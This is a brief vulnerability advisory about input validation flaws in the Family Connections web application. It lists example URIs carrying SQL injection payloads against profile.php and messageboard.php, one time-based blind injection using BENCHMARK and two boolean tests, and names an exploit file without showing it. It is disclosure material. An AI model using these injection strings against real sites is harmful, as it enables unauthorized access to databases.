Family Connections Multiple Input Validation Vulnerabilities

Family Connections Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/path/profile.php?member=1 AND IF(ASCII((SELECT CHAR(90))) = 90, BENCHMARK(10000000, MD5(0x90)), NULL)

http://www.example.com/path/messageboard.php?thread=1 AND 1=1

http://www.example.com/path/messageboard.php?thread=1 AND 1=0

The following exploit code is available:

/data/vulnerabilities/exploits/37379.c